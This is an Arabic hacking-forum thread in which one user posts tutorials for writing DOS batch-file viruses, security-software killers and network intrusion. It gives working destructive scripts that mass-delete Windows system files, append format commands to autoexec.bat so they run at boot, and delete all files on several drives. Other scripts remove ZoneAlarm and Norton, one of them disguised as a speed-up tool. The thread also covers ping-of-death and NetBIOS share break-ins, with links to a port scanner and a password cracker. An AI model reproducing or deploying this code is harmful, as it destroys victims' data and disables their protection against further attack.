تاريخ دوس أضفني للمفضلة    
سواتر ومظلات 0505380076 [ 1 من 10 ]` للكاتب مظلات و سواتر و آخر مشارك بالموضوع مظلات و سواتر  وقد زار الموضوع 8630 ورد عليه 6
محافظة دوس للتصويت والمشاركه [ 2 من 10 ]` للكاتب ابو نواف الدوسي و آخر مشارك بالموضوع مظلات و سواتر  وقد زار الموضوع 29127 ورد عليه 78
مجموعة برامج تحتوى 60 برنامجا و بحجم خيالى [ 3 من 10 ]` للكاتب Smart_boy و آخر مشارك بالموضوع سعد محمد  وقد زار الموضوع 8555 ورد عليه 4
مجموعة قرية بني يزيد [ 4 من 10 ]` للكاتب المهاوي الباسل و آخر مشارك بالموضوع هيف  وقد زار الموضوع 8818 ورد عليه 2
البيت وخلص [ 5 من 10 ]` للكاتب عمر الدوسي و آخر مشارك بالموضوع الإدارة  وقد زار الموضوع 5172 ورد عليه 1
تعريفات بأعضاء المنتدى [ 6 من 10 ]` للكاتب سماسم و آخر مشارك بالموضوع عبيدالله الدوسي  وقد زار الموضوع 19787 ورد عليه 19
لعينوكم تعريب السب سفن ولجميع الإصدارات ... شرح + تحميل (حصريا) [ 7 من 10 ]` للكاتب ابوحسين و آخر مشارك بالموضوع nicolas_cage  وقد زار الموضوع 14579 ورد عليه 8
مع جيوشيلد نص عليك ونص علينا - تعرف على العرض المميز [ 8 من 10 ]` للكاتب جليس النجوم و آخر مشارك بالموضوع جليس النجوم  وقد زار الموضوع 1 ورد عليه 0
استفسار يا اهل دوس لوسمحتم [ 9 من 10 ]` للكاتب هاني البراق و آخر مشارك بالموضوع عمر الدوسي  وقد زار الموضوع 6279 ورد عليه 2
كيف نزيد من ثقتنا في أنفسنا [ 10 من 10 ]` للكاتب عثمان جلال و آخر مشارك بالموضوع عثمان جلال  وقد زار الموضوع 1 ورد عليه 0

العودة   منتديات نجم دوس > المنتديات العلمية > منتــــدى الهكرز > الهكرز العام

موضوع مغلق
 
أدوات الموضوع انواع عرض الموضوع
  #1  
قديم 24-01-2004, 07:55 AM
MR-HONFER MR-HONFER غير متواجد حالياً
ضيف
 
تاريخ التسجيل: 16-09-2003
الدولة: alKuWit
المشاركات: 31
معدل تقييم المستوى: 0
MR-HONFER في الطريق الصحيح الى الشهرة
تعلم على شاشة الدوس +اختراق اجهزه+تصميم فايروسات +قاتلات حمايه +نت بويس والكثير

تعلم على شاشة الدوس +اختراق اجهزه+تصميم فايروسات +قاتلات حمايه +نت بويس والكثير



بسم الله الرحمن الرحيم

السلام عليكم


هذا درس كتبته لكم وجعمته بنفس الوقت من اجل الفائده

مما يتكون الدرس

الدرس يتكون مما استطعة تعلمه ولله الحمدلله وكتبة في هذا الدرس جميع المعلومات التي تخص الشاشه السوداء

ويتم حالياً تصميم موقع من اجل شاشة الدوس لكي يتم وضع اكبر قدر من دورس لشاشة الدوس من اختراق وكل شي من الممكن ان يتم عمله بشاشه الدوس ويساعد الهكر ويخدمه في عمله


اول شي
اقدم لكم كتابين استطعة الحصول عليها من احد المواقع العربي


====================
http://www.geocities.com/mr_honfer/DOS.zip
====================
http://www.geocities.com/mr_honfer/DOS1.zip
====================

والحين نبدي الموضع

ما تعلمة من شاشة الدوس

1- تعلمت كيفية تصميم الفايروسات


تعلمت كيفية تصميم الفايروسات


هنا يجب ان تعرف ان فايروسات الدوس ليست إلا بعض الاوامر المقدمه
والتي تقوم بمسح ملفات السستم من اجل ان تبطل عمل الوندز

مثال : لو اردت ان امسح ملفات معينه يكون الامر المستخدم


del اسم الملف . المسار
بحيث يكون
del file name.exe or dll او اي مسار

مثال لتصميم فايرس صغير يدمر الوندز



---------------------------------------------------الكود-------------------------------------------

del C:\windows\*.ini *.exe *.scr *.txt *.log
del C:\windows\system32\ *.ini *.exe *.scr *.txt *.log *.nls *.drf *.reg *.sys *.dll
del C:\windows\system\ *.ini *.exe *.scr *.txt *.log *.nls *.drf *.reg *.sys *.dll

--------------------------------------------------نهاية الكود---------------------------
============================================
ملاحظه: راح اقدم لكم كود فايرس من تصميمي مع مجموعة من اكواد الفايروسات من اجل
رؤيتها ومعرفة كيفية تم كتابة الاوامر من اجل المعرفه
============================================

الحين راح اشرح لكم امر الفايرس بالتفصيل المملل

اول شي قدمه امر
@del ( لمسح الملفات )

ثاني شي حدد المكان الموجوده فيه الملفات
C:\windows\
C:\windows\system32
C:\windows\system\
هذه اهي الاماكن الموجوده فيها الملفات

ثالث شي قدمه نوع المساسرات الي يجب ان تنمسح
وهذه طريقه جديد وحلوه


لو كنه نبي نمسح ملف ويكون مساره
exe
انحط
*.exe
وعلامة
*.
تعني مسح جميع الملفات التي تحمل المسار المحدد
والمسار اهو exe او اي مسار ثاني
يعني وقت نبي انصمم فايرس لاختصار الوقت والحجم والكتابه وعوار الراس انحط
*.exe
*.scr
*.ini
*.sys
*.nls
*.dll
بهذه الطريقه عطين امر بمسح الملفات ذات مسارexe.scr.ini.sys.nls.dll
مهما كان اسم الملف فهذا الشي غير مهم ما دام يحمل احد هذه المسارات سيمسح

الحين بقدم لكم كود فايرس انا امصممه وراح اشرحه لكم
اول شي حبيت اعطيكم معلومه
فكرت تصميم هذا الفايرس اخذت اسبوع ووقت التصميم اخذ فوق الساعه وفوق هذا فرمت الجهاز مرتين بيوم واحد
بس لاتاكد من عمل الفايرس واسمه
[فايرس القاتل killer virs_v1]-*_* -[فايرس القاتل]
وعمل الفايرس هو مسح الوندز بالكامل

بشرحه لكم وانشالله راح يوضح لكم طريقة التصميم هذا الشرح


-----------------------------------------الكود---------------------------------------------
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd WINDOWS
Cls
del *.exe
del *.scr
del *.ini
del *.txt
del *.dll
del *.dat
del *.sys
del *.bmp
del *.gif
del *.jpg
Cls
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
Cls
cd system
Cls
del *.manifest
del taskmgr.exe
del *.dll
del *.ocx
del *.sys
del *.ini
del *.drf
del *.log
del *.nls
Cls
del *.wsc
del *.oca
del *.msc
del *.exe
del *.com
del *.scr
del *.vbs
del *.inf
del *.acm
del *.dat
del *.HLP
Cls
del *.sve
del *.tha
del *.nls
del *.sep
del *.TXT
del *.reg
Cls
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
Cls
cd drivers
del *.sys
del *.sys
Cls
cd ..
cd CatRoot2
del *.log
del *.txt
del *.chk
Cls
cd ..
cd Com
del *.msc
del *.exe
del *.dll
del *.tlb
Cls
cd ..
cd config
del *.txt
del *.Evt
del *.sav
cd ..
@del *.dll
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd WINDOWS
cd system32
Cls
del *.manifest
del taskmgr.exe
del *.dll
Cls
del *.ocx
del *.sys
del *.ini
del *.drf
del *.log
del *.nls
del *.wsc
del *.oca
del *.msc
Cls
del *.exe
del *.com
del *.scr
del *.vbs
del *.inf
Cls
del *.acm
del *.dat
del *.HLP
del *.sve
del *.tha
Cls
del *.nls
del *.sep
del *.TXT
del *.reg
Cls
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
Cls
cd drivers
del *.sys
del *.sys
Cls
cd ..
cd CatRoot2
del *.log
del *.txt
del *.chk
Cls
cd ..
cd Com
del *.msc
del *.exe
del *.dll
del *.tlb
Cls
cd ..
cd config
del *.txt
del *.Evt
del *.sav
Cls
cd ..
@del *.dll
@echo off
echo Fuck u( >>010<<)
echo he kille u pc donot trea
echo if the virs he did not find the system file
echo u fuck he will find hem now
@del C:\windows\*.ini
Cls
@del C:\windows\*.exe
Cls
@del C:\windows\*.com
Cls
@del C:\windows\system32\*.exe
Cls
@del C:\windows\system32\*.sys
Cls
@del C:\windows\system32\*.log
Cls
@del C:\windows\system32\*.drf
Cls
@del C:\windows\system32\*.scr
Cls
@del C:\windows\system32\*.dll
Cls
@del C:\windows\system32\*.ini
Cls
@del c:\windows\system\*.exe
Cls
@del c:\windows\system\*.sys
Cls
@del c:\windows\system\*.log
Cls
@del c:\windows\system\*.drf
Cls
@del c:\windows\system\*.scr
Cls
@del c:\windows\system\*.dll
Cls
@echo off
echo Fuck u( >>010<<)
@del d:\windows\*.ini
Cls
@del d:\windows\*.exe
Cls
@del d:\windows\*.com
Cls
@del d:\windows\system32\*.exe
Cls
@del d:\windows\system32\*.sys
Cls
@del d:\windows\system32\*.log
Cls
@del d:\windows\system32\*.drf
Cls
@del d:\windows\system32\*.scr
Cls
@del d:\windows\system32\*.dll
Cls
@del d:\windows\system32\*.ini
Cls
@del d:\windows\system\*.exe
Cls
@del d:\windows\system\*.sys
Cls
@del d:\windows\system\*.log
Cls
@del d:\windows\system\*.drf
Cls
@del d:\windows\system\*.scr
Cls
@del d:\windows\system\*.dll
Cls
@echo off
echo Fuck u ( >>010<<)
@del e:\windows\*.ini
Cls
@del e:\windows\*.exe
Cls
@del e:\windows\*.com
Cls
@del e:\windows\system32\*.exe
Cls
@del e:\windows\system32\*.sys
Cls
@del e:\windows\system32\*.log
Cls
@del e:\windows\system32\*.drf
Cls
@del e:\windows\system32\*.scr
Cls
@del e:\windows\system32\*.dll
Cls
@del e:\windows\system32\*.ini
Cls
@del e:\windows\system\*.exe
Cls
@del e:\windows\system\*.sys
Cls
@del e:\windows\system\*.log
Cls
@del e:\windows\system\*.drf
Cls
@del e:\windows\system\*.scr
Cls
@del e:\windows\system\*.dll
@echo off
echo Fuck u ( >>010<<)
@del f:\windows\*.ini
Cls
@del f:\windows\*.exe
Cls
@del f:\windows\*.com
Cls
@del f:\windows\system32\*.exe
Cls
@del f:\windows\system32\*.sys
Cls
@del f:\windows\system32\*.log
Cls
@del f:\windows\system32\*.drf
Cls
@del f:\windows\system32\*.scr
Cls
@del f:\windows\system32\*.dll
Cls
@del f:\windows\system\*.exe
Cls
@del f:\windows\system\*.sys
Cls
@del f:\windows\system\*.log
Cls
@del f:\windows\system\*.drf
Cls
@del f:\windows\system\*.scr
Cls
@del f:\windows\system\*.dll
@pause
@echo off
echo Fuck u( >>010<<)
echo [killer virs_v1] By DosMan [Q8_KOL_____________]
echo if u found u pc has been fuck in theis virs u shoud now ther
echo are one man he can do that DosMan if u want virs fucker pc
echo like thet Die you mother fuckers
echo ha ha ha ha [Q8_KOL_____________]
@pause
:exit
--------------------------------------نهاية الكود-----------------------------------------------

والحين شرح الكود

امر
..cd

هو امر الرجوع للمفات للوراء

وتم استخدمامه لسبب واحد

اول ما سيتم فتح الملف سيدخل الفايرس لمفات الوندز من دون الحاجه من تحديد المسار
يعني اذا كان الوندز في
c: او d:او f:او e:
راح يصيده يعني راح يصيده لان هذا الامر يخلي الفايرس يرجع لان يوصل لملف الوندز

يعني مثلنا انا اول ما افتح شاشة الدوس تطلع لي هذا الشي

-----------------------------------------------------
D:\________s and Settings\HITLER>
------------------------------------------------------
تنفتح شاشة الدوس بهذا الشكل ويطلع لي هذا المسار

الحين شنو الامر الي لازم احط من اجل الوصول إلى ملف
windows او system او system32
الامر
cd ..
اكتبه اكثر من مره من اجل الوصول إلى الملفات المطلوبه

وللتذكير هذا الامر يستخدم للرجوع للوراء والفائده من الوصول إلى الملفات المطلوبه مهما كان المكان
الذي تم فيه فتح الفايرس


امر
cd WINDOWS
او
cd system32
او
cd system

يستخدم هذا الامر من اجل الدخول إلى الملف المطلوب

cd اسم الملف الي تبي تدخله

cd name the file u want open in dos

ويتم دخلول الملفات بعد تعين المسار المطلوب ومثل ما ترون
قدم قدمنا امر الرجوع من اجل الوصول إلى ملفات الوندز ومن ثم كتبنا اسم الملفات التي نريد ان ندخلها

بالاوامر الموجد

امر
Cls
امر تنضيف شاشة الدوس
تم استخدام هذا الامر من اجل جعل الاوامر تنفذ بسرعه ومن دون شعور الضحيه بالاوامر التي مرت عليه

del *.ocx
del *.sys
del *.ini
del *.drf
del *.log
del *.nls
del *.wsc
del *.oca
del *.msc
اعتقد ان تم شرح هذا الامر من قبل
ولا تنسون هذا الامر لمسح الملفات التي على هذه المسارات فان كنت
تريد ان تعرف كيفيه مسح ملف محدد فما عليك إلا كتابه
del file name.exe او dll او اي مسار
ويجب ان يكون الملف الذي تريد حذفه محدد المسار عن طريق شاشة الدوس

يعني لازم نكتب امر المسح اول شي ومن ثما اسم الملف المطلوب مسحه ومن ثم مسار الملف

امر @echo off

امر ستخدم من اجل كتابة اوامر تنفذ على شاشة الدوس او من اجل ظهور الكتابه على شاشة الدوس
@echo off

echo اكتب هنا الاوامر او اكتب ما تريد ان يظهر على شاشة الدوس

بعدين مثل ما اجوفون تم تحديد مسارات الملفات بذكر اسم المحرك c: // d: // e: // f: //

والسبب ان وندزي بالدي ووقت شغلت الفايرس بالسي ما صاد الملفات
يعني اذا قدمتو الفايرس بملف ون زب وكان وندزه غير موجود على السي راح يفلت من الفايرس ولهذا
السبب تم تحديد المسارات مع وضع امر المسح الكلي للمسارات دون اسم الملف

بمعني اخر ان تم تشغيل الفايرس بالكمبيوتر سيتم تدمير الجهاز ولاكن اذا تم تشغيل الفايرس بالسي ووندزه غير
موجود بالسي ما راح يصيد الملفات
بس الحين بعد التعديل راح يصيدها يعني شي اكييد الجهاز ما يتصلح إلا إذا تفرمت

--------------------------
شرح كود فايرس اخر-
-------------------------

------------------------------------------------لكود-----------------------------------------------
call attrib -h -r c:\autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
echo format e: /q /u /autotest >nul >>c:\autoexec.bat
echo format f: /q /u /autotest >nul >>c:\autoexec.bat
---------------------------------------نهاية الكود------------------------------------------------

شرح الكود

echo format c: /q /u /autotest >nul >>c:\autoexec.bat

echo من اجل الكتابه

format c: /q /u / امر فرمات

اسم حق الامر من اجل وضعه بملف autotest

nul [ عملية مضاعفه لامر الفرمات [ من اجل جعل الامر مرتين بدل مره واحده

c:\autoexec.bat المكان الذي سيتم الحفظ فيه بجهاز الضحيه

وتم اختيار اسم autoexec

من اجل ان يعمل الفايرس من تلقاء نفسه

واذا قمت بكتابة كود الفايرس بنوته باد ومن ثم تغير مسار النوته إلى bat

وفتح الملف سوف تجد ملفات باسم

autoexec موجود في c:

لان تم تحديد مكان الحفظ في السي

وستكون الاوامر بهذا الشكل

format c: /q /u /autotest
format c: /q /u /autotest

وظهرت الاوامر بهذا الشكل لاننا كتبنا في الكود nul

ولهذا السبب تم مضاعفة الامر في الملف الذي عمله الفايرس نسخه في السي

ومثل ما ترون تم مضاعفة الامر الذي شرحته لكم اكثر من مره

------------------------------
كود فايرس اخر


--------------------------------------------------الكود--------------------------------------
@echo off
ATTRIB -a -s -h -r c:\*.*
ATTRIB -a -s -h -r c:\windows\*.*
Echo y | echo a | Echo y |del c:\*.*
Echo y | echo a | Echo y |del d:\*.*
Echo y | echo a | Echo y |del e:\*.*
echo y | copy *.* c:\
echo y | copy *.* D:\
echo y | copy *.* E:\
restart

------------------------------------نهاية الكود-----------------------------------------

شرح الكود

بالاول حبين ان اوضح لكم ان عندما تقدم امر
*.*
وهو امر لمسح كل الملفات الموجود بالمجلد الذي حددته بشاشة الدوس

ستظهر رساله تطلب من الموافقه على هذا الامر

للتوضيح

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\^^MR-HONFER^^\^^MR-HONFER^^VIRS\virs in bat>cd n

C:\^^MR-HONFER^^\^^MR-HONFER^^VIRS\virs in bat\n>del *.*
C:\^^MR-HONFER^^\^^MR-HONFER^^VIRS\virs in bat\n\*.*, Are you sure (Y/N)? y

C:\^^MR-HONFER^^\^^MR-HONFER^^VIRS\virs in bat\n>

مثل ما ترون عندما تم الطلب مسح جميع الملفات الموجوده في مجلد n

خرجة لي رساله من اجل التأكد من موافقتي Are you sure (Y/N)

وبعد الظغط على

y

تم المسح

ولاكن ما هي الطريقه المتبعه من اجل تفادي هذه الرساله اذا كنا نريد ان نعمل فايرس بأوامر الدوس

الحل موجود بكود الفايرس الذي قدمته لكم

امر

Echo y | echo a | Echo y |del *.*

يستخدم لمسح جميع الملفات من دون الطلب

وطريقة استخدام الامر تتم بعد تحديد مسار الملف الذي تريد دخوله عن طريق الدوس ومن ثم كتابة الامر

ومن ثم يتم المسح

ولاكن الذي يوجد به هذا الكود ان تم تحديد المسار

Echo y | echo a | Echo y |del c:\*.*

ومثل ما هو ظاهر ان تم تحديد مسح جميع الملفات التي في المحرك c:

وتم كتابة مثل هذا الامر في كود الفايرس ولاكن من اجل مسح المحركات الاخري

وكان ذالك بتحديد المحركات مثل ما ترون

فتم تحديد المحرك
c:
d:
e:
من اجل ان يتم حذف جميع الملفات التي فيه

والامر الذي بعد الامر الحذف هو امر نسخ جميع الملفات

echo y | copy *.*

وهذا الامر يعطي امكانيه نسخ جميع الملفات من دون خروج رسالة الموافقه مثل التي مبينه عندكم

*.*, Are you sure (Y/N)? y

ولاكن بكود الفايرس تم تحديد المسارات مثل ما ترون
c:
d:
e:

وبذالك نكون شرحنه هذا الكود

============================================
ملاحظه : سأقدم بأخر الموضوع ملف مضغوط فيه مجموعة من فايروسات الدوس وسأضع الاكواد الخاصه فيها
من اجل ان تتعلم اكثر ومن اجل زيادة التعلم والخبره
============================================

سؤال للفاهمين وللي قرو الموضوع : تم وضع كود خطير وصغير تستطيع بهذا الكود تدمير اي جهاز بثواني استخرج هذا الكود من هذا الدرس الذي هو
درس تصميم الفايروسات بالدوس
وللتوضيح هذا الكود انكتب باول الدرس بس ما بينت اهميته لاني ناطر الي فاهمين يسالون وعشان اعرف من الي يدخل دخول الكرام بالموضوع ويقول مشكور ومن
الي قره الموضوع وخلاني احترمه واقدره لانه يبي يتعلم
============================================
قبل انهاء الدرس الاول بالدوس حبيت اذكركم ان بعد ان يتم كتابة الاوامر في نوته باد

يتم تغير المسار إلى bat

تم انتهاء الدرس

مع تحياتي

Hashom AL7$UNEe

Q8_KOL_____________

  #2  
قديم 24-01-2004, 08:00 AM
MR-HONFER MR-HONFER غير متواجد حالياً
ضيف
 
تاريخ التسجيل: 16-09-2003
الدولة: alKuWit
المشاركات: 31
معدل تقييم المستوى: 0
MR-HONFER في الطريق الصحيح الى الشهرة

2-كيفية تصميم قاتلات للبرامج تقتل برامج الحمايه


اعتقد ان شرح عمل الفايرس راح يسهل لكم معرفة كيفية قتل برامج الحمايه

ولهذا السبب راح اقدم لكم كود لقتل الزال ارام وارمو فاير ولل وراح اشرحه لكم

من اجل توضيح الفكره



------------------------------ا㺄كود-------------------------------------------------
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd WINDOWS
cd system32
del vsdatant.sys
del vsdata.dll
del vsmonapi.dll
cd ZoneLabs
del vsdb.dll
cd ..
cd system32
del vsutil.dll
cd ZoneLabs
del html.tdr
del vsmon.exe
del vsruledb.dll
cd ZoneAlarm
del expert.dll
del zauninst.exe
cd ..
cd ..
cd ..
cd Program Files
cd Zone Labs
cd ZoneAlarm
dir
del *.exe
del *.dll
cd ..
cd ..
cd ..
cd WINDOWS
cd system32
cd ZoneLabs
del vspubapi.dll
del zlparser.dll
del cerbprovider.pvx
cd ZoneAlarm
del *.dll
del *.exe
del *.zap
cd images
del *.gif
cd ..
cd ZoneAlarm
cd Help
del *.chm
cd ..
cd ..
cd ..
cd ..
cd Program Files
cd Zone Labs
cd ZoneAlarm
dir
cd ..
cd Program Files
cd Zone Labs
dir
@pause

del ZoneAlarm
@pause
@echo off

@echo if u found u Firewall has been kill
@echo u shoud now ther are 1 man he can do that
@echo DosMan if u want killer like thet
@echo Die you mother fuckers
@echo ha ha ha ha [Q8_KOL_____________]
@pause


--------------------------------نⵗاية الكود------------------------------
مثل ما اجوفون اول شي امر الرجوع من اجل الوصول إلى ملفات الوندز والملفات المطلوبه

امر
cd

من اجل دخلول الملفات المطلوبه


================================================== =======================
ملاحظه: عندما يتم تنزيل برنامج الزال ارام إلى الجهاز يقوم البرنامج بنسخ بعض ملفات السستم في
system32
ووضع ملف له في system32
لذلك تم من طريق هذا القاتل حذف هذه الملفات بالكامل


================================================== =======================
بعد حذف الملفات التابعه للزال ارم الموجوده في ملف الستتم system32
يتم اعطاء امر للدخول إلى ملف Program Files

cd Program Files

ومن ثم دخلو ملف الزال ارام
cd Zone Labs
cd ZoneAlarm

وبعد ذالك يتم تقديم امر الحذف

بالاول يتم تحديد الملفات عن طريق امر

dir

ومن ثم يتم الحذف
بامر
del *.exe

del *.dll
del *.exe
del *.zap

انا اعتقد انكم عارفين شنو اوامر الكود الحين واتمني ان اتكونون فاهمينها
فكل ما في الامر ان تم دخلو ملفات البرنامج وتم حذفها بالكامل

راح اشرح لكم اكثر

هذا كود ثاني عندي من زمان حلو واصغير بس مو من تصميم
ما اذكر من وين يايه لانه موجود عندي من وقت اطويل



----------------------------------------------------الكود-------------------------------------------------

@echo welcome to the "OppEdL Software" by HI DO U WANT LIET U PC MORE FAST .
@pause
@echo the "OppEdl DO U WANT CON.....(step by step)
@pause
@echo TO CON... PRES Press Y Then press enter
@pause
@del c:\progra~1\norton~1
@pause
@del c:\progra~1\zonea~1\zonealarm
@pause
@echo FUCK U!!!
@pause
@echo FUCK U!!!
@pause
:exit



-----------------------------ن㻍اية الكود------------------------------------

الكود يتكون من خدعه

قبل الشرح


================================================== =======================
ملاحظه: حبيت اني ابين لكم ان الدرس راح يتكون من وضع اكواد وشرحها

لان هذه افضل طريقه للتعلم والي ما تعلم خله يقولي من اجل تقديم دروس ذات وضوح اكثر


================================================== =======================

شرح الكود :
@echo من اجل الكتابه بشاشه الدوس
@pause للتوقف مجدداً
مثل ما ترون الكود مكون من مجموعة اوامر كتابه على شاشة الدوس ومع اوامر توقفي مؤقت التي هي pause
وهذا الامر يعطي اماكنيه التكمله اذا تم ظغط اي زر على الكيبورد

اعطي امر الحذف

-----------
@del c:\progra~1\norton~1
--------------------
ومن ثم امر اخر للحذف

----------------
@del c:\progra~1\zonea~1\zonealarm
----------------

وبالاخير اظهر نواياه الشريره لول
ودليل على ذالك كلمه Fuck u
بعد ما حذف واخذ الي يبيه سبه

وتتكون نهاية القصه من امر اغلاق شاشة الدوس بعد ان تم حذف النورتن الموجود على مسار السي
وحذف الزال ارام الموجود على السي
ونذكر الشاهدين الكرام ان الامر الاول للحذف كان من اجل حذف النورتن

والامر الثاني لحذف الزال ارام

وبعد اتمام المهم يتم اطعطاء امر
للخروج :
:exit



نهاية الدرس



ارجو ان تكونو قد استفتو من الموضوع

مع تحياتي

Hashom AL7$UNEe

Q8_KOL_____________

  #3  
قديم 24-01-2004, 08:06 AM
MR-HONFER MR-HONFER غير متواجد حالياً
ضيف
 
تاريخ التسجيل: 16-09-2003
الدولة: alKuWit
المشاركات: 31
معدل تقييم المستوى: 0
MR-HONFER في الطريق الصحيح الى الشهرة

3-عرفت بعض طرق اختراق الاجهزه عن طريق الدوس (متعوب عليه هذا الدرس)




بسم الله الرحمن الرحيم



للعلم >>>> هناك العديد من طرق اختراق الاجهزه عن طريق الدوس وبعملية بحثي بالعديد من المنتديات العربيه والانجليزيه والمواقع الانجليزيه وجدت بعض الدروس المهم ووجدة بعض الطريق ولاكني لا اعتقد اني وصلت إلى ما اريده ومع ذالك ساقدم لكم ما استطعت معرفته





نتوكل على الله ونبدي الموضوع



ساقدم لكم الدروس التي استطعت الحصول عليها



درس رقم واحد (الدرس انجليزي)

الدرس الاول

DOS Attacks

------------------------------->



DOS Attacks orDenial Of Services Attacks have
become very common amongst _______ who use them as
a path to fame and respect in the underground groups of the Internet.
They are basically a way of denying valid Internet and Network users
from using the services of the tar___ network or ______. It basically means,
launching an attack, which will temporarily make the services, offered by
the Network unusable by legitimate users.

In other words, a DOS attack is one in which you clog up so
much memory on the tar___ system that it cannot serve legitimate users.
Or you send the tar___ system data packets, which cannot be handled by it and thus
causes it to either crash, reboot or more commonly deny services to legitimate users.

This is the most common vulnerability:


Ping of Death

This vulnerability is quite well known and was
earlier commonly used to hang remote systems (or even force them to reboot)
so that no users can use its services. This exploit no longer works, as almost all system
administrators would have upgraded their systems making them safe from such attacks.

In this attack, the tar___ system is pinged with a data
packet that exceeds the maximum bytes allowed by TCP/IP, which is 65 536. This
would have almost always caused the remote system to hang, reboot or crash. This DOS attack
could be carried out even through the command line, in the following manner:

The following Ping command creates a huge datagram of
the size 65540 for Ping. It might hang the victim's computer:


C:windows>ping -l 65540


Distributed DOS Attacks

DOS attacks are not new; in fact they have been
around for a long time. However there has been a recent
wave of Distributed Denial of Services attacks which pose a great
threat to Security and are on the verge of overtaking Viruses/Trojans to
become the deadliest threat to Internet Security. Now you see, in almost all
of the above TCP/IP vulnerabilities, which are being exploited by _______, there
is a huge chance of the tar___'s system administrator or the authorities tracing the
attacks and ___ting hold of the attacker.


No system connected to the Internet is safe
from such DOS attacks:Including Unix, Windows NT . Even MacOS has not been
spared, as some of them are being used to conduct such DDOS attacks.



نهاية الدرس



بعض النطاق التوضيحيه للدرس



يبين الموضوع طرق الهجوم بالدوس ويبين كيفية الضغط على الجهاز من عملية الطلب التي ترسل

وعملية الهجوم التي تستخدم بالدوس لها القدره على ان تعلق الجهاز او الموقع المهجوم عليه



ويقول الكاتب ان طريق الهجوم بالدوس من الطرق القديمه والمشهوره جداً

ويبين الكتاب ان لا يوجد نظام يتصل بالانترنت من الممكن ان يكون بأمان من هجوم الدوس

هذه الخلاصه نهاية درس رقم واحد لتعليم طريق اختراق الاجهزه وظرب المواقع عن طريق الدوس

نهاية درس رقم واحد

------------------------------------------------------------------------------------------------------------------------------------------------



الدرس الثاني

بهذا الدرس سأجمع مجموعة من الدروس العربيه من اجل ان اجعلها متكامله فقد وجدت ان بكل درس من هذه الدروس غير كامل وبعضها يكمل بعض لذلك سأحاول شرحها من اجل ان تكون متكامله



بالاول الموضوع يتكلم ان امر (Netstat)

--------------------------------------------------------------------------------------------------

ملاحظه : قد قرأت العديد من الطرق المستخدمه باختراق الاجهزه عن طريق الدوس وقد توصلة من هذه المواضيع الطريقه الصحيحه

--------------------------------------------------------------------------------------------------

وللي قاعد على الهكر مده اطويله اشويه راح يفهم كلامي

وقت اقول ان كل ما في الامر ايجاد بورت 139 ومن ثم معرفة اذا كان الجهاز يوجد فيه امر المشاركات ويتم المعرفه عن طريق الدوس ومن ثم

اختراق الجهاز بامر الرن ويكون بهذا الشكل

127.0.0.1\\

ومكان 127.0.0.1 تقوم بكتابة الايبي الخاص بالضحيه

بحيث انك تقوم بدخول جهاز الضحيه وكل ما عليك فعله بعد ذالك وضع سيرفر للتجسس او للاختراق في الاستارت اب وبعد اعادة التشغيل

سيتم اختراق الجهاز بكل سهوله

اما للمبتدأين سيتم الشرح بدقه



ماذا تحتاج

تحتاج لبرنامج من اجل البحث عن المنافذ وتحتاج لبرنامج كسر باسوردات الشبكات

وهذا اهو برنامج الاسكان

قم باستخدام احد برامج البحث وهي كيره ومن اشهرها Superscan
http://www.angelfire.com/realm/hackerglue/superscan.exe

وان لم تعمل الرابطه فقم بالبحث بالانترنت عن طريق محرك البحث googel

وهذا برنامج pqwak2

من اجل كسر باسورد الشبكات



http://packetstormsecurity.nl/0010-exploits/pqwak2.zip



الان نبدا العمل

قم بفتح برنامج Superscan

وقم بالبحث عن بورت 139



بعد ايجاد العديد من الاجهزه المصابه بهذا المنفذ قم بنسخ احد الايبيات ومن ثم قم بدخول شاشه الدوس عن طريق الرن بكتابه ___ او Command

قم بكتابه هذا الامر من اجل الحصول على بيانات الجهاز

nbtstat -a 127.0.0.1

127.0.0.1 >> قم بكتابة الايبي الخاص بالضحيه بدل هذا الايبي

بعد كتابة الامر

اذا ظهرت لك معلومات عن الضحيه تكون قد خطوت خطوه الاوله لاختراق جهازه



بعد ذالك تقوم بكتابة

net view \\127.0.0.1

بعد كتابة الامر ستظهر مكونات الجهاز فاذ لم تظهر لن تستطيع اختراق واذا ظهرت سيكون كل ما عليك عمله هو كتابة هذا الامر في الرن

127.0.0.1\\

